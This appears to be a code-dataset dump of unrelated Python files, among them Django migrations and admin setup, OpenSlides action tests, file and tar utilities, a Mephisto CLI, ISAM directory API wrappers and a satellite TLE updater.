('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('tmdb_id', models.TextField()),
('name', models.TextField()),
('profile_picture_url', models.URLField()),
('biography', models.TextField(null=True)),
('day_of_birth', models.DateField(null=True)),
('day_of_death', models.DateField(null=True)),
('homepage', models.URLField(null=True)),
('birthplace', models.TextField(null=True)),
('aliases', django.contrib.postgres.fields.ArrayField(base_field=models.TextField(), default=list, size=None)),
],
),
migrations.AddIndex(
model_name='person',
index=models.Index(fields=['tmdb_id'], name='movies_pers_tmdb_id_944488_idx'),
),
migrations.AddField(
model_name='movierating',
name='movie',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ratings', to='movies.Movie'),
),
migrations.AddField(
model_name='movielist',
name='movies',
field=models.ManyToManyField(to='movies.Movie'),
),
migrations.AddField(
model_name='movie',
name='genres',
field=models.ManyToManyField(related_name='movies', to='movies.Genre'),
),
migrations.AddField(
model_name='movie',
name='similar_movies',
field=models.ManyToManyField(related_name='_movie_similar_movies_+', to='movies.Movie'),
),
migrations.AddField(
model_name='castmember',
name='movie',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cast_members', to='movies.Movie'),
),
migrations.AddField(
model_name='castmember',
name='person',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='roles', to='movies.Person'),
),
migrations.AddIndex(
model_name='movie',
index=models.Index(fields=['tmdb_id'], name='movies_movi_tmdb_id_0e4cad_idx'),
),
migrations.AddIndex(
model_name='movie',
index=models.Index(fields=['imdb_id'], name='movies_movi_imdb_id_d04af4_idx'),
),
]
|
19,762 | 417345060a25d108a65f56efb988f684cc702c08 | from contextlib import closing
class RefrigeratorRaider:
def open(self):
print('open the fridge door')
def take(self, food):
print('Finding {}...'.format(food))
if food == 'pizza':
raise RuntimeError("too much pizza is not good for your health!")
print("Taking {}...".format(food))
def close(self): # this implements the closing protocol.
print("Close the fridge door!")
def raid(self, food):
# this calls 'close()' automatically by the context manager!
with closing(RefrigeratorRaider()) as r:
r.open()
r.take(food)
def main():
r = RefrigeratorRaider()
r.raid('two apples!')
r.raid('pizza')
if __name__ == '__main__':
main()
|
19,763 | b5ada0f8651a0e0593a2ceee632223218ffd5ec7 | from unittest.mock import Mock
from openslides_backend.action.action_handler import ActionHandler
from openslides_backend.action.util.typing import Payload
from .base import BaseActionTestCase
class GeneralActionCommandFormat(BaseActionTestCase):
"""
Tests the interface to datastore-command with one WriteRequest
per payload-action and it's own locked_fields
"""
def get_action_handler(self) -> ActionHandler:
logger = Mock()
config = Mock()
handler = ActionHandler(config, self.services, logger)
handler.user_id = 1
handler.internal = False
return handler
def test_parse_actions_create_2_actions(self) -> None:
self.create_model(
"meeting/1", {"name": "meeting1", "is_active_in_organization_id": 1}
)
payload: Payload = [
{
"action": "group.create",
"data": [
{
"name": "group 1",
"meeting_id": 1,
}
],
},
{
"action": "group.create",
"data": [
{
"name": "group 2",
"meeting_id": 1,
}
],
},
]
action_handler = self.get_action_handler()
write_requests, _ = action_handler.parse_actions(payload)
self.assertEqual(len(write_requests), 2)
self.assertEqual(len(write_requests[0].events), 2)
self.assertCountEqual(
write_requests[0].locked_fields.keys(),
[
"group/meeting_id",
"group/weight",
"meeting/1/group_ids",
],
)
self.assertEqual(write_requests[0].events[0]["type"], "create")
self.assertEqual(write_requests[0].events[1]["type"], "update")
self.assertEqual(str(write_requests[0].events[0]["fqid"]), "group/1")
self.assertEqual(str(write_requests[0].events[1]["fqid"]), "meeting/1")
self.assertEqual(len(write_requests[1].events), 2)
self.assertCountEqual(
write_requests[1].locked_fields.keys(),
[
"group/meeting_id",
"group/weight",
],
)
def test_parse_actions_create_1_2_events(self) -> None:
self.create_model(
"meeting/1", {"name": "meeting1", "is_active_in_organization_id": 1}
)
payload: Payload = [
{
"action": "group.create",
"data": [
{
"name": "group 1",
"meeting_id": 1,
},
{
"name": "group 2",
"meeting_id": 1,
},
],
},
]
action_handler = self.get_action_handler()
write_requests, _ = action_handler.parse_actions(payload)
self.assertEqual(len(write_requests), 1)
self.assertEqual(len(write_requests[0].events), 3)
self.assertCountEqual(
write_requests[0].locked_fields.keys(),
[
"group/meeting_id",
"group/weight",
"meeting/1/group_ids",
],
)
self.assertEqual(write_requests[0].events[0]["type"], "create")
self.assertEqual(write_requests[0].events[1]["type"], "create")
self.assertEqual(write_requests[0].events[2]["type"], "update")
self.assertEqual(str(write_requests[0].events[0]["fqid"]), "group/1")
self.assertEqual(str(write_requests[0].events[1]["fqid"]), "group/2")
self.assertEqual(str(write_requests[0].events[2]["fqid"]), "meeting/1")
def test_create_2_actions(self) -> None:
self.create_model(
"meeting/1", {"name": "meeting1", "is_active_in_organization_id": 1}
)
response = self.request_json(
[
{
"action": "group.create",
"data": [
{
"name": "group 1",
"meeting_id": 1,
}
],
},
{
"action": "group.create",
"data": [
{
"name": "group 2",
"meeting_id": 1,
}
],
},
],
)
self.assert_status_code(response, 400)
self.assertIn(
"Datastore service sends HTTP 400. The following locks were broken: 'group/meeting_id', 'group/weight'",
response.json["message"],
)
self.assert_model_not_exists("group/1")
self.assert_model_not_exists("group/2")
self.assert_model_exists("meeting/1", {"group_ids": None})
def test_create_1_2_events(self) -> None:
self.create_model(
"meeting/1", {"name": "meeting1", "is_active_in_organization_id": 1}
)
response = self.request_multi(
"group.create",
[
{
"name": "group 1",
"meeting_id": 1,
},
{
"name": "group 2",
"meeting_id": 1,
},
],
)
self.assert_status_code(response, 200)
self.assert_model_exists("group/1", {"name": "group 1", "meeting_id": 1})
self.assert_model_exists("group/2", {"name": "group 2", "meeting_id": 1})
def test_update_2_actions(self) -> None:
self.set_models(
{
"meeting/1": {
"name": "name1",
"committee_id": 1,
"welcome_title": "t",
"is_active_in_organization_id": 1,
},
"meeting/2": {
"name": "name2",
"committee_id": 1,
"welcome_title": "t",
"is_active_in_organization_id": 1,
},
"committee/1": {"name": "test_committee"},
}
)
response = self.request_json(
[
{
"action": "meeting.update",
"data": [
{
"id": 1,
"name": "name1_updated",
}
],
},
{
"action": "meeting.update",
"data": [
{
"id": 2,
"name": "name2_updated",
}
],
},
],
)
self.assert_status_code(response, 200)
meeting1 = self.get_model("meeting/1")
assert meeting1.get("name") == "name1_updated"
meeting2 = self.get_model("meeting/2")
assert meeting2.get("name") == "name2_updated"
def test_update_1_2_events(self) -> None:
self.set_models(
{
"meeting/1": {
"name": "name1",
"committee_id": 1,
"welcome_title": "t",
"is_active_in_organization_id": 1,
},
"meeting/2": {
"name": "name2",
"committee_id": 1,
"welcome_title": "t",
"is_active_in_organization_id": 1,
},
"committee/1": {"name": "test_committee"},
}
)
response = self.request_multi(
"meeting.update",
[
{
"id": 1,
"name": "name1_updated",
},
{
"id": 2,
"name": "name2_updated",
},
],
)
self.assert_status_code(response, 200)
meeting1 = self.get_model("meeting/1")
assert meeting1.get("name") == "name1_updated"
meeting2 = self.get_model("meeting/2")
assert meeting2.get("name") == "name2_updated"
def test_delete_2_actions(self) -> None:
self.set_models(
{
"meeting/1": {
"name": "name1",
"committee_id": 1,
"welcome_title": "t",
"is_active_in_organization_id": 1,
},
"meeting/2": {
"name": "name2",
"committee_id": 1,
"welcome_title": "t",
"is_active_in_organization_id": 1,
},
"committee/1": {"name": "test_committee", "meeting_ids": [1, 2]},
}
)
response = self.request_json(
[
{
"action": "meeting.delete",
"data": [
{
"id": 1,
}
],
},
{
"action": "meeting.delete",
"data": [
{
"id": 2,
}
],
},
],
)
self.assert_status_code(response, 200)
self.assert_model_deleted("meeting/1")
self.assert_model_deleted("meeting/2")
self.assert_model_exists("committee/1", {"meeting_ids": []})
def test_delete_1_2_events(self) -> None:
self.set_models(
{
"meeting/1": {
"name": "name1",
"committee_id": 1,
"welcome_title": "t",
"is_active_in_organization_id": 1,
},
"meeting/2": {
"name": "name2",
"committee_id": 1,
"welcome_title": "t",
"is_active_in_organization_id": 1,
},
"committee/1": {"name": "test_committee", "meeting_ids": [1, 2]},
}
)
response = self.request_multi(
"meeting.delete",
[
{
"id": 1,
},
{
"id": 2,
},
],
)
self.assert_status_code(response, 200)
self.assert_model_deleted("meeting/1")
self.assert_model_deleted("meeting/2")
self.assert_model_exists("committee/1", {"meeting_ids": []})
|
19,764 | d2279821b40b9ac41efd7a8da878b151e4676a2b | # -*- coding:utf-8 -*-
import shutil
import os
import re
import sys
import json
import pymysql
import requests
import tempfile
def get_cur_path():
'''
@summary:
'''
if getattr(sys, 'frozen', False):
return os.path.dirname(sys.executable)
elif __file__:
return os.path.dirname(__file__)
def get_files(dir_name, recursive=False, suffix_names=(".TXT",)):
'''
@summary: walk target directory get files with suffix
'''
if not os.path.isdir(dir_name):
return
for name in os.listdir(dir_name):
suffix = get_suffix(name)
full_name = os.path.join(dir_name, name)
if os.path.isfile(full_name):
if not suffix_names:
yield full_name
elif suffix.upper() in suffix_names:
yield full_name
elif os.path.isdir(full_name) and recursive:
for full_name in get_files(full_name, recursive, suffix_names):
yield full_name
else:
pass
def get_suffix(file_name):
'''
@summary: get suffix name with point (.txt)
@param f_name: file name
@return: suffix with point like (.txt)
'''
try:
return os.path.splitext(file_name)[1]
except IndexError as error:
print(error)
return
def get_file_name(f_name):
'''
@summary: return file name without suffix
'''
try:
return os.path.splitext(f_name)[0]
except Exception as error:
print(error)
return
def get_create_time(file_name):
'''
@summary:
'''
#return os.stat(file_name).st_ctime
#return datetime.fromtimestamp(os.path.getctime(file_name))
return os.path.getctime(file_name)
def check_path(path):
'''
@summary: if not exist path create it
'''
if os.path.isdir(path):
return True
try:
os.makedirs(path)
except Exception:
return False
return True
def is_crown_dir(dir_name):
'''
@summary:
'''
if not os.path.isdir(dir_name):
return False
for name in os.listdir(dir_name):
full_name = os.path.join(dir_name, name)
if os.path.isdir(full_name):
return False
return True
def get_crown_dirs(dir_name):
'''
@summary:
'''
if not os.path.isdir(dir_name):
return
for name in os.listdir(dir_name):
full_name = os.path.join(dir_name, name)
if os.path.isfile(full_name):
continue
elif os.path.isdir(full_name):
if is_crown_dir(full_name):
yield full_name
else:
for f_name in get_crown_dirs(full_name):
yield f_name
return
def remove_empty_dir(path):
'''
@summary: delete empty directory
'''
if not os.path.isdir(path):
return
for name in os.listdir(path):
sub_dir = os.path.join(path, name)
remove_empty_dir(sub_dir)
if os.listdir(path):
return
try:
os.rmdir(path)
except IOError as error:
print("ERROR")
return
def get_content_list(f_txt):
'''
@summary:
'''
with open(f_txt, "r", encoding="utf-8") as h_file:
while True:
text = h_file.readline()
if not text:
break
yield text.strip()
def get_content(f_txt, encoding=None):
'''
@summary:
'''
with open(f_txt, "r", encoding=encoding) as h_file:
return h_file.read()
def save_file(f_txt, text_list):
'''
@summary:
'''
with open(f_txt, "w") as h_file:
h_file.writelines(text_list)
def save_mess(f_name, mess_str):
'''
@summary:
'''
with open(f_name, "a", encoding="utf-8") as h_file:
if isinstance(mess_str, list):
h_file.write("\n".join(mess_str))
h_file.write("\n")
else:
h_file.write(mess_str)
h_file.write("\n")
def load_json(f_json):
'''
@summary:
'''
con_list = get_content_list(f_json)
json_str = ""
for str_value in con_list:
str_value = str_value.replace("\n", "")
str_value = str_value.replace("\r", "")
json_str += str_value
return json.loads(json_str)
def get_video_file(path, video_id):
'''
'''
for f_video in get_files(path, True, (".MP4", ".AVI")):
if f_video.find(video_id) <= 0:
continue
return f_video
def get_upload_dict():
f_log = "upload.log"
upload_dict = {}
if not os.path.isfile(f_log):
return upload_dict
for content in get_content_list(f_log):
value_list = content.strip().split("\t")
try:
cat_name, key = value_list
keys = upload_dict.get(cat_name, [])
keys.append(key)
upload_dict[cat_name] = keys
except Exception as error:
pass
return upload_dict
def get_int_list(str_value):
return re.findall(r'\d+', str_value)
def get_hex_list(str_value):
return re.findall(r'[0-9|a-f|A-F]+', str_value)
def save_image(u_dict, tar_path):
os.mkdir(tar_path)
count = 0
for key in u_dict:
count += 1
if count >= 400:
break
f_img = u_dict[key]
dst = os.path.join(tar_path, os.path.basename(f_img))
shutil.copy(f_img, dst)
import tarfile
def extract_tar_files(f_tar):
des_dir = os.path.join(os.path.dirname(f_tar), "photos")
with tarfile.open(f_tar) as fp:
for name in fp.getnames():
fp.extract(name, path=des_dir)
def make_targz(output_filename, keys):
try:
f_path = os.path.dirname(output_filename)
if not os.path.isdir(f_path):
os.makedirs(f_path)
with tarfile.open(output_filename, "w:gz") as h_tar:
for f_img in keys:
if not os.path.isfile(f_img):
continue
h_tar.add(f_img, arcname=os.path.basename(f_img))
except Exception as error:
return False
return True
def get_escape_str(ori_str):
# for pymysql get safe string
if ori_str is None:
return pymysql.NULL
if isinstance(ori_str, str):
return "'{}'".format(pymysql.escape_string(ori_str))
return ori_str
def string_to_file(string):
temp_file = tempfile.NamedTemporaryFile()
temp_file.write(string)
temp_file.flush()
temp_file.seek(0)
return temp_file
def get_remote_file(url):
session = requests.Session()
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) "\
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 "\
"Safari/537.36",
'Rerfer': url}
response = session.get(url, headers=headers)
if response.status_code != 200:
return
return string_to_file(response.content)
|
19,765 | e2e615fd1c24d61eeb1789f7e21719d2c86f86eb | from src.meshine_project.meshine_api.WebMetaDataGenerator.WebMetaDataGenerator_dev import WebMetaDataGenerator
webMetaDataGenerator = WebMetaDataGenerator('https://www.presse-citron.net/comment-reveiller-creativite-innover-lab-postal-2018/')
webMetaDataGenerator.generate_tags()
#webMetaDataGenerator.tags_from_newspaper() |
19,766 | 0b30a3a4f53d3e0bcfec7b44140bc4e11130a10a | # pylint: disable=W5101
from django.db import models
from . import Event
class FeatureConfiguration(models.Model):
"""
Recursos ativados pela Congressy para ser utilizado em um evento.
"""
SYSTEM_USER_NAME = 'system'
class Meta:
verbose_name = 'Configuração de Features'
verbose_name_plural = 'Configurações de Features'
def __str__(self):
return self.event.name
event = models.OneToOneField(
Event,
on_delete=models.CASCADE,
primary_key=True,
verbose_name='evento',
related_name='feature_configuration',
)
last_updated_by = models.CharField(
max_length=255,
verbose_name="atualizado por",
default=SYSTEM_USER_NAME,
)
feature_survey = models.BooleanField(
default=False,
verbose_name='funcionalidade - form. personalizado',
help_text='Liberar funcionalidade de formulário personalizado no'
' evento.'
)
feature_checkin = models.BooleanField(
default=False,
verbose_name='funcionalidade - check-in',
help_text='Liberar funcionalidade de check-in no evento.'
)
feature_certificate = models.BooleanField(
default=False,
verbose_name='funcionalidade - certificado',
help_text='Liberar funcionalidade de certificado no evento.'
)
feature_products = models.BooleanField(
default=False,
verbose_name='funcionalidade - opcionais',
help_text='Liberar funcionalidade de opcionais no evento.'
)
feature_services = models.BooleanField(
default=False,
verbose_name='funcionalidade - atividades extras',
help_text='Liberar funcionalidade de atividades extras no evento.'
)
feature_internal_subscription = models.BooleanField(
default=False,
verbose_name='funcionalidade - inscrições internas',
help_text='Liberar funcionalidade de organizadores poderão inserir '
'inscrição interna manualmente.'
)
feature_manual_payments = models.BooleanField(
default=False,
verbose_name='funcionalidade - pagamentos manuais',
help_text='Liberar funcionalidade de organizadores poderão inserir '
'pagamentos manuais.'
)
feature_boleto_expiration_on_lot_expiration = models.BooleanField(
default=False,
verbose_name='funcionalidade - vencimento dos boletos',
help_text='Liberar funcionalidade vencimento dos boletos na da data '
'de vencimento dos lotes'
)
feature_import_via_csv = models.BooleanField(
default=False,
verbose_name='funcionalidade - importação via CSV',
help_text='Liberar funcionalidade de permitir importação via csv'
)
feature_multi_lots = models.BooleanField(
default=False,
verbose_name='funcionalidade - multi lotes',
help_text='Liberar funcionalidade de multi lotes'
)
feature_raffle = models.BooleanField(
default=False,
verbose_name='funcionalidade - sorteios',
help_text='Liberar funcionalidade de sorteios'
)
|
19,767 | ddcf30c942810dd7a167d8ed7d1ef898d2e7cd5b | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import click
from click_default_group import DefaultGroup
# @click.group(cls=DefaultGroup, default="web", default_if_no_args=True)
@click.group(cls=DefaultGroup)
def cli():
pass
@cli.command("web")
def web():
"""Launch a local webserver with the Mephisto UI"""
from mephisto.client.server import app
app.run(debug=False)
@cli.command("check")
def check():
"""Checks that mephisto is setup correctly"""
from mephisto.core.local_database import LocalMephistoDB
from mephisto.core.utils import get_mock_requester
try:
db = LocalMephistoDB()
get_mock_requester(db)
except Exception as e:
click.echo("Something went wrong.")
click.echo(e)
return
click.echo("Mephisto seems to be set up correctly.")
@cli.command("requesters")
def list_requesters():
"""Lists all registered requesters"""
from mephisto.core.local_database import LocalMephistoDB
from tabulate import tabulate
db = LocalMephistoDB()
requesters = db.find_requesters()
dict_requesters = [r.to_dict() for r in requesters]
click.echo(tabulate(dict_requesters, headers="keys"))
@cli.command("register", context_settings={"ignore_unknown_options": True})
@click.argument("args", nargs=-1)
def register_provider(args):
"""Register a requester with a crowd provider"""
if len(args) == 0:
click.echo("Usage: mephisto register <provider_type> --arg1:value --arg2:value")
return
from mephisto.core.local_database import LocalMephistoDB
from mephisto.core.registry import get_crowd_provider_from_type
from mephisto.core.argparse_parser import parse_arg_dict, get_extra_argument_dicts
provider_type, requester_args = args[0], args[1:]
args_dict = dict(arg.split(":") for arg in requester_args)
transformed = dict(
(key, {"option_string": key, "value": value})
for (key, value) in args_dict.items()
)
crowd_provider = get_crowd_provider_from_type(provider_type)
RequesterClass = crowd_provider.RequesterClass
if len(requester_args) == 0:
from tabulate import tabulate
params = get_extra_argument_dicts(RequesterClass)
for param in params:
click.echo(param["desc"])
click.echo(tabulate(param["args"].values(), headers="keys"))
return
try:
parsed_options = parse_arg_dict(RequesterClass, transformed)
except Exception as e:
click.echo(str(e))
if "name" not in parsed_options:
click.echo("No name was specified for the requester.")
db = LocalMephistoDB()
requesters = db.find_requesters(requester_name=parsed_options["name"])
if len(requesters) == 0:
requester = RequesterClass.new(db, parsed_options["name"])
else:
requester = requesters[0]
try:
requester.register(parsed_options)
click.echo("Registered successfully.")
except Exception as e:
click.echo(str(e))
if __name__ == "__main__":
cli()
|
19,768 | adda98e0b3b8036a65d5392ebc212e4c2035f4ab | from sklearn.externals import joblib
import numpy as np
MLPCOD = joblib.load("./model/MLPCOD.save")
MLPEMI = joblib.load("./model/MLPEMI.save")
sc = joblib.load("./model/scaler.save")
def predict(age, autoBill, paytmFirst, postpaid, ppOutstanding, opIn6Months, op6MviaEpay, op6MViaCOD, mall6M, travel6M, totalMoney, walletMoney, ratio):
# ' age', 'Is_auto_billing_on', 'Is_paytm_first', 'Is_postpaid',
# 'postpaid_outstanding', 'Orders_placed_in_6months',
# 'Orders_placed_in_6months_via_epay', 'Orders_placed_in_6months_via_cod',
# 'Total_money_on_order_from_mall_6months',
# 'Total_money_on_order_on_travel_6months', 'Total_money_spent',
# 'Total_money_added_on_wallet', 'RatioDvP'
X = np.array([[35, 0, 1, 1,
0, 25,
12, 13,
12000,
0, 12000,
100, 1]])
X_sc = sc.transform(X)
y_cod = MLPCOD.predict(X_sc)
y_emi = MLPEMI.predict(X_sc)
return [y_cod, y_emi]
# X contains in this order: ['age', 'Is_auto_billing_on', 'Is_paytm_first', 'Is_postpaid',
# 'postpaid_outstanding', 'Orders_placed_in_6months',
# 'Orders_placed_in_6months_via_epay', 'Orders_placed_in_6months_via_cod',
# 'Total_money_on_order_from_mall_6months',
# 'Total_money_on_order_on_travel_6months', 'Total_money_spent',
# 'Total_money_added_on_wallet', 'RatioDvP']
# where RatioDvP is ("Orders_delivered_in_6months")/("Orders_placed_in_6months"+1)
# master data contains ['age', 'Id', 'Is_auto_billing_on', 'Is_paytm_first', 'Is_postpaid',
# 'postpaid_outstanding', 'Orders_placed_in_6months',
# 'Orders_placed_in_6months_via_epay', 'Orders_placed_in_6months_via_cod',
# 'Orders_placed_in_6months_via_emi', 'Orders_delivered_in_6months',
# 'Total_money_on_order_from_mall_6months',
# 'Total_money_on_order_on_travel_6months',
# 'Total_money_on_order_on_movie_6months', 'Total_money_spent',
# 'Total_money_added_on_wallet', 'CODorNot', 'EMIorNot', 'RatioDvP'] |
19,769 | a8459816e8f78aaab6fdf099346901e439c28f80 | import numpy as np
def multiply(m1, m2):
return np.dot(m1, m2)
def add(m1, m2):
return np.add(m1, m2)
def sub(m1, m2):
return np.subtract(m1, m2)
def concat(m1, elem):
to_concat = np.array([elem], ndmin=2)
return np.concatenate((m1, to_concat), axis=0)
def cut_last_row(m1):
return m1[:np.shape(m1)[0] - 1][:]
def activate_exp(x):
return np.exp(x)/(1 + np.exp(x))
def activate_arctan(x):
return np.arctan(x)
def derivative_exp(x):
return np.exp(x)/np.power(1 + np.exp(x), 2)
def derivative_arctan(x):
return 1/(np.power(x, 2) + 1)
def transpose(x):
return np.transpose(x)
def normal_random_value(m, s, min_val=-np.inf, max_val=np.inf):
value = np.random.normal(m, s, (1, 1))
np.place(value, value > max_val, max_val)
np.place(value, value < min_val, min_val)
return value[0][0]
def normal_random_matrix(m, s, rows, columns, min_val=-np.inf, max_val=np.inf):
matrix = np.random.normal(m, s, (rows, columns))
np.place(matrix, matrix > max_val, max_val)
np.place(matrix, matrix < min_val, min_val)
return matrix
|
19,770 | 19764120a162a88df56c9e8fd1d6f1c9b73e6d69 | import logging
import ibmsecurity.utilities.tools as tools
import json
try:
basestring
except NameError:
basestring = (str, bytes)
logger = logging.getLogger(__name__)
def get_all(isamAppliance, check_mode=False, force=False):
"""
Retrieving the list of federated directories
"""
return isamAppliance.invoke_get("Retrieving the list of federated directories",
"/isam/runtime_components/federated_directories/v1")
def get(isamAppliance, id, check_mode=False, force=False):
"""
Retrieving the details for a particular federated directory
"""
return isamAppliance.invoke_get("Retrieving the details for a particular federated directory",
"/isam/runtime_components/federated_directories/{0}/v1".format(id))
def set(isamAppliance, id, hostname, port, bind_dn, bind_pwd, suffix, use_ssl=False, client_cert_label=None,
ignore_if_down=False,
check_mode=False, force=False):
if _exists(isamAppliance, id) is False:
return add(isamAppliance, id=id, hostname=hostname, port=port, bind_dn=bind_dn, bind_pwd=bind_pwd,
suffix=suffix, use_ssl=use_ssl, client_cert_label=client_cert_label,
ignore_if_down=ignore_if_down,
check_mode=check_mode,
force=True)
else:
return update(isamAppliance, id=id, hostname=hostname, port=port, bind_dn=bind_dn, bind_pwd=bind_pwd,
suffix=suffix, use_ssl=use_ssl, client_cert_label=client_cert_label,
ignore_if_down=ignore_if_down,
check_mode=check_mode,
force=force)
def add(isamAppliance, id, hostname, port, bind_dn, bind_pwd, suffix, use_ssl=False, client_cert_label=None,
ignore_if_down=False,
check_mode=False, force=False):
"""
Create a new federated directory
"""
if (isinstance(suffix, basestring)):
import ast
suffix = ast.literal_eval(suffix)
if force is True or _exists(isamAppliance, id) is False:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
json_data = {
'id': id,
'hostname': hostname,
'port': port,
'bind_dn': bind_dn,
'bind_pwd': bind_pwd,
'use_ssl': use_ssl,
'suffix': suffix
}
if ignore_if_down and tools.version_compare(isamAppliance.facts["version"], "10.0.4") >= 0:
json_data['ignore_if_down'] = ignore_if_down
# Do not pass if there is no value - call fails otherwise
if client_cert_label is not None:
json_data['client_cert_label'] = client_cert_label
return isamAppliance.invoke_post(
"Create a new federated directory",
"/isam/runtime_components/federated_directories/v1", json_data)
return isamAppliance.create_return_object()
def update(isamAppliance, id, hostname, port, bind_dn, bind_pwd, suffix, use_ssl=False, client_cert_label=None,
ignore_if_down=False,
check_mode=False, force=False):
"""
Update an existing federated directory
"""
if force is True or (
_exists(isamAppliance, id) and _check(isamAppliance, id, hostname, port, bind_dn, bind_pwd,
use_ssl, client_cert_label, suffix, ignore_if_down) is False):
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
json_data = {
'hostname': hostname,
'port': port,
'bind_dn': bind_dn,
'bind_pwd': bind_pwd,
'use_ssl': use_ssl,
'suffix': suffix
}
if ignore_if_down and tools.version_compare(isamAppliance.facts["version"], "10.0.4") >= 0:
json_data['ignore_if_down'] = ignore_if_down
# Do not pass if there is no value - call fails otherwise
if client_cert_label is not None:
json_data['client_cert_label'] = client_cert_label
return isamAppliance.invoke_put(
"Update an existing federated directory",
"/isam/runtime_components/federated_directories/{0}/v1".format(id), json_data)
return isamAppliance.create_return_object()
def delete(isamAppliance, id, check_mode=False, force=False):
"""
Remove an existing federated directory
"""
if force is True or _exists(isamAppliance, id) is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_delete(
"Remove an existing federated directory",
"/isam/runtime_components/federated_directories/{0}/v1".format(id))
return isamAppliance.create_return_object()
def _exists(isamAppliance, id):
"""
Check if federated directory exists
:param isamAppliance:
:param id:
:return:
"""
exists = False
ret_obj = get_all(isamAppliance)
for snmp in ret_obj['data']:
if snmp['id'] == id:
exists = True
break
return exists
def _check(isamAppliance, id, hostname, port, bind_dn, bind_pwd, use_ssl, client_cert_label, suffix, ignore_if_down=False):
"""
Check if parameters match given federated directory
Note: This does not check bind_pwd
Returns True if it exists and is the same
"""
if _exists(isamAppliance, id):
ret_obj = get(isamAppliance, id)
else:
return False
set_value = {
'id': id,
'hostname': hostname,
'port': str(port),
'bind_dn': bind_dn,
'use_ssl': use_ssl,
'suffix': suffix
}
if use_ssl is True:
set_value['client_cert_label'] = client_cert_label
if ignore_if_down and tools.version_compare(isamAppliance.facts["version"], "10.0.4") >= 0:
set_value['ignore_if_down'] = ignore_if_down
newEntriesJSON = json.dumps(set_value, skipkeys=True, sort_keys=True)
logger.debug("\nSorted New Federated Directory {0}: {1}".format(id, newEntriesJSON))
currentEntriesJSON = json.dumps(ret_obj['data'], skipkeys=True, sort_keys=True)
logger.debug("\nSorted Existing Federated Directory {0}: {1}".format(id, currentEntriesJSON))
if newEntriesJSON == currentEntriesJSON:
return True
else:
return False
def compare(isamAppliance1, isamAppliance2):
"""
Compare federated directory stanze entries between two appliances
"""
ret_obj1 = get_all(isamAppliance1)
ret_obj2 = get_all(isamAppliance2)
return tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
|
19,771 | 8ddfe37ac8db6441389a602c527f607790592468 | # class Solution:
# def findDuplicate(self, nums: List[int]) -> int:
#
# tortoise = nums[0]
# hare = nums[0]
#
# while True:
#
# tortoise = nums[tortoise]
# hare = nums[hare]
# hare = nums[hare]
#
# if tortoise == hare:
# break
#
# hare = nums[0]
#
# while hare != tortoise:
# hare = nums[hare]
# tortoise = nums[tortoise]
#
# return hare
class Solution:
def findDuplicate(self, nums: List[int]) -> int:
while True:
temp = nums[0]
if nums[temp] == temp:
return temp
nums[0] = nums[temp]
nums[temp] = temp
|
19,772 | daa7a2ff7b9c082ce870b9a0665fe1c3a17f1fa1 | '''
Created on Jul 16, 2013
@author: Maksim Roienko
@company: BinTime
'''
from src.ProductPage import ProductPage
class MainPage(object):
'''
Class MainPage describes home page of fututrumshop.nl
'''
def __init__(self, driver):
self.driver = driver
def search(self, param1):
self.driver.find_element_by_id("fc_search").send_keys(param1)
self.driver.find_element_by_id("searchBarButton").click()
return ProductPage(self.driver)
|
19,773 | 484e665489a3b40d104796e60baa2e2ac527d52f | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from .models import Corpus
from .models import File
from .models import Phrase
from .models import Project
from .models import Process
from .models import Report
from .models import Translation
##admin.site.register(Project, ProjectAdmin)
admin.site.register(Corpus)
admin.site.register(File)
admin.site.register(Phrase)
admin.site.register(Process)
admin.site.register(Project)
admin.site.register(Report)
admin.site.register(Translation)
#admin.site.register(Report)
|
19,774 | fd43afd15193b6f162dbd37dda8f90768c1da344 | import urllib.request
from skyfield.api import EarthSatellite
from settings import TLE_SETTINGS
from utils import chunker
TLEs = []
TLEs_byID = {}
satellites = []
satellites_byID = {}
def prep_data():
global TLEs
global TLEs_byID
global satellites
global satellites_byID
for tle in TLEs:
satellite = EarthSatellite(tle['line1'], tle['line2'], tle['name'])
satellites.append(satellite)
tle['epoch'] = str(satellite.epoch.utc_iso())
TLEs_byID = {sat['id']: sat for sat in TLEs}
satellites_byID = {sat.model.satnum: sat for sat in satellites}
def update_TLEs():
global TLEs
url = TLE_SETTINGS['url']
req = urllib.request.Request(url, method='GET')
retrieved_lines = []
with urllib.request.urlopen(req) as f:
if f.status == 200:
retrieved_lines = [line.decode().replace('\r\n', '').strip()
for line in list(f.readlines())]
else:
raise Exception("Error downloading TLE file")
new_TLEs = []
for group in chunker(retrieved_lines, 3):
sat = {
'name': group[0],
'id': int(group[2].split()[1]),
'line1': group[1],
'line2': group[2]
}
new_TLEs.append(sat)
TLEs = new_TLEs
prep_data()
update_TLEs() |
19,775 | b2f699eafce1439cbc9b3cfd8f7634933cc498e3 | from flask_migrate import Migrate
from flask_restful import Api
import config
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__, template_folder='templates')
app.config.from_object(config.Config)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
api = Api(app)
from . import models
from src import routes
|
19,776 | b5204ceb072b163ec1b04827d08c3ec83a9b0a5e | import threading
import ConfigParser
cfg = {}
cp = ConfigParser.ConfigParser()
cp.read('/home/ente/src/ente.cfg')
for section in cp.sections():
sec_cfg = dict([(key.lower(), value) for key, value in cp.items(section)])
cfg[section.lower()] = sec_cfg
def get_section(s):
return cfg[s.lower()]
def get_entry(e, default=None):
section, key = e.lower().split(".", 1)
return cfg.get(section, {}).get(key, default)
def add_change_hook(f):
pass
from __main__ import global_stuff, bootstrap_thread
global_stuff.config_funcs = [get_section, get_entry, add_change_hook]
import ente_init
ente_init.init_io_redirect("utf-8")
# ente processes don't provide sys.argv, thats why we fake it here
import sys
sys.argv = ["run.py"]
